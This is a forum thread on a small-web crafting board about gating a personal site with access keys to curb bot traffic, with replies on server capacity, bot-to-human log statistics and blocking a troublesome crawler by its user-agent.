how do you feel about website access? - ✁ ∙ Web Crafting

World Wild Web > ✁ ∙ Web Crafting

how do you feel about website access?

(1/2) > >>

Memory:
[removed by author]

Melooon:
That's a fun solution, and it definitely opens the door for you to play with the idea a bit and make your site more unique! I assume if you're giving everyone personal access keys then you can also code the site to personalise itself to each key? Maybe make their name appear or allow them to have a favourite colour that changes the design :grin: You could even make a personalised newsletter that emails them only things they haven't read.

Although.. I suppose on the flip side to that, you'd also have to track each personal access key to log what individuals are reading on your site :tongue: (Im not denouncing this, used altruistically this is great info for any writer/blogged, but it does run the risk of spoiling the writers direction of interest! It may also deter some people from visiting.)

As far as I know the Neocities approach is to simply overwhelm bots with resources - e.g. if you have 500 visitors and 5000 bots, then you make your server able to handle 20,000 visitors/bots.

That's an approach I tend to try and replicate; I always make sure that there are at least 3x more resources than necessary since the pain of things going offline at a bad moment is more than the pain of providing the resources.

That's definitely not a good approach for anyone self-hosting on dialup or using a very low-power server; but for anyone using VPS hosting its a viable system. There is always a limit to the number of bots that can exist since they suffer exactly the same bandwidth limits web hosts do, so I suppose they will always balance each other out :eyes:

brisray:
Just my tuppence worth, I find any sort of restriction on me viewing a website puts me off of it for a long time. I do sign up for sites, but only if they have enough viewable content to make me interested in what else they have.

Just some thoughts on traffic and bots in general...

The second you open a computer up on the web the bots will find it. I found that out over 20 years ago. They just don't crawl the sites, I've had automated attacks against both the web and FTP servers I run. Although I've hardened the servers as much as I can, I am certain I couldn't stop a determined attack against them.

I've been playing around with my old web logs, even in 2011, the oldest I've still got, bots were responsible for twice the number of visits as humans - well, almost all humans, it's hard to tell if I missed some. June 2011 - 8,449 pages (human) vs 17,476 (bots). It's only gotten worse October 2023 - 34,100 (human) vs 918,543 (bots).

The server (Apache) can easily cope with the traffic - I keep track of that as well, and my ISP hasn't complained about the bandwidth usage. If you're using dial-up then it might be a problem.

If the bots get too much, I'll send them off somewhere - maybe the black hole of 0.0.0.0 or a Japanese porn site or something.

The largest bot visits I get are my own fault. A startup penetration testing company made me an offer I couldn't refuse - free scans for life! Once a month they crawl every file on my largest site as well as poke around to see if they can get out of the server. Guess what my biggest security risk is? Making the logs and server status page public - too much information about what's going on behind the public face of the sites.

Memory:
[removed by author]

dirtnap:
on the actual problem: this isn't about palo alto's detested crawler, is it? the one that flagrantly ignores robots.txt?

are you not able to block access to your server according to user-agent? because frankly, if not, i'd say that's the bigger issue here. since this crawler's ua is comically recognisable, it should be possible to block any request containing the phrase "expanse, a palo alto", or for that matter probably just "palo alto".

i think blocking the offending crawler (whcih again, should be simple to do via the recognisable ua) is a much more reasonable response to the problem of one crawler requesting too much traffic than...denying everyone access to your site.

because in response to your final question:

--- Quote ---would my approach deter you from visiting my site if it were implemented?
--- End quote ---

i would think "well that's a novel way to harvest emails", close the tab, and forget about your site.

any site that requires me to do anything to view it beyond select a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.

Navigation

[0] Message Index

[#] Next page

Go to full version